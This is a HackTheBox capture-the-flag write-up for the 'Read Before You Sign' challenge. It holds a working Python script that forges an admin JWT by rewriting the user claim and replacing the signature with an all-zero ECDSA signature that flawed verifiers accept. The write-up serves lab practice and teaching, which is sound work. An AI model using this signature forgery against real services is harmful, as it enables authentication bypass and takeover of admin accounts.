HackTheBox Read Before You Sign Challenge
https://app.hackthebox.com/challenges/789
Description
E Corp’s control hinges on their ability to manipulate and monitor the population. A crucial system has been infiltrated, and it contains vital information about the EverLast chemical. As a member of the immune group, your mission is to gain administrator privileges within the system and access confidential secrets. The system’s defenses appear robust, but we believe there’s a vulnerability waiting to be exploited due to their outdated infrastructure. Discover the hidden truths and help us dismantle their control over society. The future of our freedom rests in your hands.
Exploitation
The script below registers a throwaway account, logs in, and takes the JWT from the token cookie. It then rewrites the payload so the user claim reads admin and replaces the signature segment with MAYCAQACAQA, which is the base64url encoding of the DER bytes 30 06 02 01 00 02 01 00: an ECDSA signature with r = 0 and s = 0. A verifier that does not reject r and s outside the range 1..n-1 can end up accepting that signature for any message, so no signing key is needed; the forged token is accepted on /list and the flag is returned.

#!/usr/bin/python3
import re
import sys
import requests
from base64 import urlsafe_b64decode, urlsafe_b64encode

# DER encoding of the ECDSA signature (r = 0, s = 0):
#   30 06 02 01 00 02 01 00  ->  SEQUENCE { INTEGER 0, INTEGER 0 }
# base64url-encoded without padding, as a JWT signature segment.
NULL_SIGNATURE = "MAYCAQACAQA"


def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    # No trailing slash: the paths below start with one.
    return f"http://{sys.argv[1]}"


URL = get_base_url()


def b64url_decode(segment):
    # JWT segments are base64url without padding; restore it before decoding.
    return urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    return urlsafe_b64encode(data).rstrip(b"=").decode()


def craft_admin_token(jwt):
    header, payload, _ = jwt.split(".")
    # Blunt byte replace: turns the user claim into admin (any other "user"
    # substring in the payload is rewritten as well).
    new_payload = b64url_encode(b64url_decode(payload).replace(b"user", b"admin"))
    # The server accepts the all-zero signature, so the real one is simply dropped.
    return f"{header}.{new_payload}.{NULL_SIGNATURE}"


def jwt_user():
    creds = {"username": "htb_user", "password": "htb_user"}
    requests.post(f"{URL}/register", data={**creds, "email": "user@htb.eu"})
    response = requests.post(f"{URL}/login", data=creds)
    if response.status_code != 200:
        print(f"Error during login: {response.text}")
        sys.exit(1)
    token = response.cookies.get("token")
    if not token:
        print("Error: JWT token not found in cookies")
        sys.exit(1)
    return token


def send_admin_token(token):
    response = requests.get(f"{URL}/list", cookies={"token": token})
    match = re.search(r"HTB\{.*?\}", response.text)
    return match.group(0) if match else "Flag not found"


if __name__ == "__main__":
    admin_token = craft_admin_token(jwt_user())
    flag = send_admin_token(admin_token)
    print(flag)
Summary
Read Before You Sign: the application trusts a JWT whose signature is never properly range-checked, so the all-zero ECDSA signature (DER 30 06 02 01 00 02 01 00, base64url MAYCAQACAQA) verifies against any payload. Register, log in, rewrite the user claim to admin, swap in the null signature, and read the flag from /list.